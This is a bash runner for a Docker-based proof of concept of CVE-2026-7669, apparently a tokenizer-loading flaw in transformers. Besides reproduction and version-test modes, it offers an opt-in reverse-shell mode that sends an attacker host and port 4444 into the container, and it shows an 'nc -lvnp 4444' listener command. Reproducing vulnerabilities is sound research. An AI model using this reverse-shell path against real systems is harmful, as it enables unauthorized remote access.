#!/usr/bin/env bash
# CVE-2026-7669 PoC runner.
#
# Usage:
#   ./run.sh                      Full PoC (preflight + 4 phases + ledger).
#   ./run.sh --server             Reproduce via TokenizerManager init path.
#   ./run.sh --versions           Test transformers 5.0..5.5 matrix.
#   ./run.sh --revshell HOST      Opt-in reverse shell to HOST:4444.
#   ./run.sh --rebuild            Force --no-cache rebuild.
#   ./run.sh --copy-ledger PATH   Run then copy ledger to PATH.
set -euo pipefail
IMAGE_TAG="cve-2026-7669"
# IMAGE_TAG is the tag given to the locally built PoC image; every mode below
# builds and runs that one image.

# Work from the directory that holds this script so that `docker build .`
# uses it as the build context regardless of where the script was invoked.
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
cd "$SCRIPT_DIR"

# Preflight: the docker CLI must be on PATH.
command -v docker >/dev/null 2>&1 || {
  echo "ERROR: docker not found in PATH." >&2
  exit 127
}

# Preflight: the CLI must be able to query the daemon. Any `docker info`
# failure ends up here, so the message also covers cases such as a daemon
# the current user cannot reach.
docker info >/dev/null 2>&1 || {
  echo "ERROR: docker daemon not running." >&2
  exit 127
}
#######################################
# Build the PoC image from the current directory.
# Globals:   IMAGE_TAG (read) - tag applied to the built image
#            REBUILD   (read) - "1" adds --no-cache to the build
# Arguments: none
# Outputs:   a banner, the last three lines of the combined build output
#            (stdout and stderr), then a blank line
# Returns:   status of the final blank-line print; a failed build only
#            aborts the script because the caller enables errexit/pipefail
#######################################
build_image() {
  local -a build_args=(build)

  # A forced rebuild bypasses the layer cache.
  if [[ "${REBUILD:-0}" == "1" ]]; then
    build_args+=(--no-cache)
  fi
  build_args+=(-t "$IMAGE_TAG" .)

  printf '%s\n' "[*] Building $IMAGE_TAG ..."
  # Keep the console short: only the tail of the build log is shown.
  docker "${build_args[@]}" 2>&1 | tail -3
  printf '\n'
}
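# Mode dispatch: the first argument selects how the PoC image is built and run.
#
# The usage text is read back from this file's header comment. The script has
# already changed into SCRIPT_DIR, so a relative "$0" (for example
# "poc/run.sh" when started from the parent directory) no longer resolves;
# address the file through SCRIPT_DIR instead.
self_path="$SCRIPT_DIR/${0##*/}"

# NOTE(review): every `docker run` / `docker create` below uses Docker's
# default network and adds no resource or capability limits. Whether the PoC
# phases need network access is not visible from this script; confirm against
# the Dockerfile and setup_model.py before tightening, e.g. `--network none`
# for the modes that do not need it.
case "${1:-}" in
  --help | -h)
    # Prints lines 2-12 of this file.
    # NOTE(review): keep the range in sync with the header comment.
    sed -n '2,12p' "$self_path"
    exit 0
    ;;
  --rebuild)
    # build_image reads REBUILD and adds --no-cache when it is "1".
    export REBUILD=1
    build_image
    docker run --rm "$IMAGE_TAG"
    ;;
  --revshell)
    # Opt-in mode: HOST is mandatory and is handed to the container through
    # ATTACKER_HOST; the port is fixed at 4444 through ATTACKER_PORT.
    if [[ -z "${2:-}" ]]; then
      echo "Usage: ./run.sh --revshell <attacker-ip>" >&2
      exit 1
    fi
    echo "Listener: nc -lvnp 4444 on the attacker host first."
    build_image
    docker run --rm -e ATTACKER_HOST="$2" -e ATTACKER_PORT=4444 "$IMAGE_TAG"
    ;;
  --server)
    # Replace the image entrypoint and run the server-path reproduction.
    build_image
    docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
      "python3 setup_model.py && python3 test_server.py"
    ;;
  --versions)
    # Replace the image entrypoint and run the version-matrix test.
    build_image
    docker run --rm --entrypoint bash "$IMAGE_TAG" -c \
      "python3 setup_model.py && python3 test_versions.py"
    ;;
  --copy-ledger)
    if [[ -z "${2:-}" ]]; then
      echo "Usage: ./run.sh --copy-ledger <out-path>" >&2
      exit 1
    fi
    # A relative path resolves against the script directory, because the
    # script changed into it before reaching this point.
    out_path="$2"
    build_image
    # The container is created without --rm so the ledger can be copied out
    # after the run has finished.
    cid="$(docker create "$IMAGE_TAG")"
    # Remove the container on every exit from here on, including the abort
    # that errexit triggers when `docker cp` fails; otherwise a stopped
    # container holding the PoC artefacts is left behind.
    trap 'docker rm -f "$cid" >/dev/null || echo "WARN: could not remove container $cid" >&2' EXIT
    # The run's exit status is deliberately ignored so that the ledger is
    # still collected when the PoC itself exits non-zero.
    docker start -ai "$cid" || true
    docker cp "$cid:/tmp/poc_claim_ledger.json" "$out_path"
    echo "[*] Ledger written to $out_path"
    ;;
  "")
    # Default: full PoC run with the image's own entrypoint.
    build_image
    docker run --rm "$IMAGE_TAG"
    ;;
  *)
    echo "Unknown option: $1" >&2
    sed -n '2,12p' "$self_path"
    exit 2
    ;;
esac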